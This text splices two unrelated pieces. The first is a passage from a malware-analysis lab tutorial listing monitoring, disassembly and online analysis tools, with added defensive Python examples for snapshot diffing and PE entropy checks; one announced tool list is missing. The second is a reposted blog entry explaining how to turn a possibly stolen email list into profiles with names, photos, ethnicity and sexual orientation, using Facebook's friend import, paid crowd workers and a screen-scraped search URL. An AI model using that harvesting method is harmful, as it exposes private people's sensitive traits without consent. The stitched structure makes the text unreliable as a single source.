Before you’re ready to infect your laboratory system with the malware specimen, you need to install and activate the appropriate monitoring tools. Free utilities that will let you observe how Windows malware interacts with its environment include:
- File system and registry monitoring: Process Monitor and Capture BAT offer a powerful way to observe in real time how local processes read, write, or delete registry entries and files. These tools can help you understand how malware attempts to embed into the system upon infection.
- Process monitoring: Process Explorer and Process Hacker replace the built-in Windows Task Manager, helping you observe malicious processes, including local network ports they may attempt to open.
- Network monitoring: Wireshark and SmartSniff are network sniffers, which can observe laboratory network traffic for malicious communication attempts, such as DNS resolution requests, bot traffic, or downloads.
- Change detection: Regshot is a lightweight tool for comparing the system’s state before and after the infection, to highlight the key changes malware made to the file system and the registry.
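The change-detection idea behind Regshot (baseline the system, run the specimen, diff) is simple enough to reproduce for the file-system half in a few lines. The script below is an added example, not part of the original article or of Regshot: it hashes every file under a directory tree, takes a second snapshot after the "infection", and reports what was added, removed or modified. The lab tree, the dropped DLL name and the tampered hosts file in `demo()` are constructed test data; on a real lab box you would snapshot the system drive before and after detonation instead.

```python
"""Regshot-style change detection for a directory tree (added example)."""
import hashlib
import tempfile
from pathlib import Path


def snapshot(root):
    """Record every regular file under root as relative-path -> (size, sha256)."""
    root = Path(root)
    state = {}
    for path in root.rglob("*"):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            state[path.relative_to(root).as_posix()] = (path.stat().st_size, digest)
    return state


def diff_snapshots(before, after):
    """Compare two snapshots; a file is 'modified' if its size or hash changed."""
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    modified = sorted(p for p in set(before) & set(after) if before[p] != after[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Build a constructed lab tree, simulate an infection, return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        sys32 = root / "Windows" / "System32"
        sys32.mkdir(parents=True)
        (sys32 / "hosts").write_text("127.0.0.1 localhost\n")
        (root / "Windows" / "win.ini").write_text("[fonts]\n")
        lab = root / "Users" / "lab"
        lab.mkdir(parents=True)
        (lab / "notes.txt").write_text("hello\n")

        before = snapshot(root)  # pristine baseline, taken before detonation

        # Constructed "malware" behaviour (assumed, not from any real specimen):
        # drop a DLL, poison the hosts file, delete a user document.
        (sys32 / "svchost32.dll").write_bytes(b"MZ" + b"\x90" * 64)
        (sys32 / "hosts").write_text(
            "127.0.0.1 localhost\n127.0.0.1 update.example.test\n")
        (lab / "notes.txt").unlink()

        after = snapshot(root)
        return diff_snapshots(before, after)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Hashing rather than relying on size or timestamps matters here: malware that patches a system file in place keeps the size identical, and timestamps are trivially forged.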
Behavioral monitoring tools can give you a sense for the key capabilities of malicious software. For further details about its characteristics, you may need to roll up your sleeves and perform some code analysis.
Step 4: Install code-analysis tools
Examining the code that comprises the specimen helps uncover characteristics that may be difficult to obtain through behavioral analysis. In the case of a malicious executable, you rarely will have the luxury of access to the source code from which it was created. Fortunately, the following free tools can help you reverse compiled Windows executables:
- Disassembler and debugger: OllyDbg and IDA Pro Freeware can parse compiled Windows executables and, acting as disassemblers, display their code as Intel x86 assembly instructions. These tools also have debugging capabilities, which allow you to execute the most interesting parts of the malicious program slowly and under highly controlled conditions, so you can better understand the purpose of the code.
- Memory dumper: LordPE and OllyDump help obtain protected code located in the lab system’s memory and dump it to a file. This technique is particularly useful when analyzing packed executables, which are difficult to disassemble because they encode or encrypt their instructions, extracting them into RAM only during run-time.
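Before reaching for a memory dumper it helps to know whether a specimen is packed at all. Encoded or encrypted section contents look like random data, so per-section Shannon entropy is a quick tell. The following is an added example, not code from the article or from any of the tools it names: a small pure-Python parser for the PE section table, an entropy measure, and a constructed two-section PE image (a plain `.text` section and a pseudo-random `UPX1` section) used only as test data. The 7.0 bits-per-byte threshold and the section names in the sample are assumptions for illustration.

```python
"""Flag likely-packed PE sections by entropy (added example)."""
import math
import random
import struct
from collections import Counter


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant buffer, up to 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image):
    """Walk the COFF section table of a PE image held in memory.

    Returns a list of (name, raw_offset, raw_size, characteristics).
    Offsets follow the PE/COFF specification: e_lfanew at 0x3C, then the
    'PE\\0\\0' signature, a 20-byte COFF header, the optional header, and
    40-byte section headers.
    """
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, off + 16)
        chars = struct.unpack_from("<I", image, off + 36)[0]
        sections.append((name, raw_ptr, raw_size, chars))
    return sections


def section_entropies(image, threshold=7.0):
    """Return [(name, entropy rounded to 2 places, suspicious)] per section."""
    report = []
    for name, ptr, size, _chars in pe_sections(image):
        h = shannon_entropy(image[ptr:ptr + size])
        report.append((name, round(h, 2), h >= threshold))
    return report


def build_sample_pe():
    """Construct a minimal, non-runnable PE image as test data (not real malware)."""
    text_data = bytes(range(16)) * 256                      # 16 symbols -> entropy 4.0
    rng = random.Random(2010)
    packed_data = bytes(rng.getrandbits(8) for _ in range(4096))  # ~7.95 bits/byte
    opt_size = 0xE0                                          # PE32 optional header
    text_off = 0x40 + 4 + 20 + opt_size + 40 * 2
    packed_off = text_off + len(text_data)

    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)  # PE32 magic, rest zero

    def section(name, ptr, data, chars):
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
        # NumberOfLinenumbers, Characteristics
        return struct.pack("<8sIIIIIIHHI", name, len(data), 0, len(data), ptr,
                           0, 0, 0, 0, chars)

    table = (section(b".text", text_off, text_data, 0x60000020)
             + section(b"UPX1", packed_off, packed_data, 0xE0000040))
    return dos + b"PE\0\0" + coff + opt + table + text_data + packed_data


if __name__ == "__main__":
    for name, entropy, suspicious in section_entropies(build_sample_pe()):
        print(f"{name:8s} {entropy:5.2f} {'PACKED?' if suspicious else ''}")
```

High entropy alone is not proof of packing (compressed resources or embedded certificates score just as high), and a section at 4.0 can still hold a decryption stub; read the result alongside the section names and characteristics before deciding to dump from memory.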
Step 5: Utilize online analysis tools
To round off your malware-analysis toolkit, add to it some freely available online tools that may assist with the reverse engineering process. One category of such tools performs automated behavioral analysis of the executables you supply. These applications look similar at first glance, but use different technologies on the back end. Consider submitting your malware specimen to several of these sites; depending on the specimen, some sites will be more effective than others. Such tools include:
Another set of potentially useful online tools provides details about websites that are suspected of hosting malicious code. Some of these tools examine the sites you specify in real time; others provide historical information. Consider submitting a suspicious URL to several of these sites, because each may offer a slightly different perspective on the website in question:
- Real-time threat assessment: Finjan URL Analysis, McAfee SiteAdvisor, and Wepawet
- Historical reputation data: Norton Safe Web and WOT (Web of Trust)
Next Steps
With your initial toolkit assembled, start experimenting in the lab with malware you come across on the web, in your e-mail box, on your systems, and so on. You may find this one-page cheat sheet convenient.
Begin analysis with the tools and approaches most familiar to you. Then, as you become more familiar with the inner workings of the malware specimen, venture out of your comfort zone to try other tools and techniques. The tools I’ve listed within each step operate virtually identically. Since they’re all free, you should feel free to try them all. You’ll find that one tool will work better than another, depending on the situation. And with time, patience, and practice, you will learn to turn malware inside out.
How to convert email addresses into name, age, ethnicity, sexual orientation
From: http://maxklein.posterous.com/
So you have somehow begged, borrowed or stolen an email list of 1000 users who you believe are interested in your new service. Would it not be great if you could somehow convert that list into real people, with real photos, and perhaps even more concrete information like “My service has a higher than average gay consumer group” or “My dating service seems to be very popular among 9 year old girls”? Such information can help you correct course before you are too invested in a particular idea you have.
Well, a few weeks back, we were handed down this lovely present by our masters from above: Facebook. Save your email list as a CSV file (just comma separate those email addresses). Upload this file to your Facebook account as if you wanted to add them as friends. Voila, Facebook will give you all the profiles of all those users (in my test, about 80% of my email lists have Facebook profiles). Now, click through each profile, and because of the new default Facebook settings, which make all information public, about 95% of the user info is available for you to harvest.
If your email list is too large, then use the very same CSV file and upload it to Mechanical Turk (a list of 10,000 would cost you about $10), and ask the Mechanical Turk workers to gather this information for you.
After you have all the demographic information you want, try to do good with it. My personal advice to Facebook users: switch on your privacy settings and make your friends list private. Businesses want this information, and Facebook has given it to them.
Update (from a reddit comment): Use this URL http://www.facebook.com/search/?ref=ffs&q=name@domain.com&o=2048&init=ffs and screenscrape for even more spammy goodness.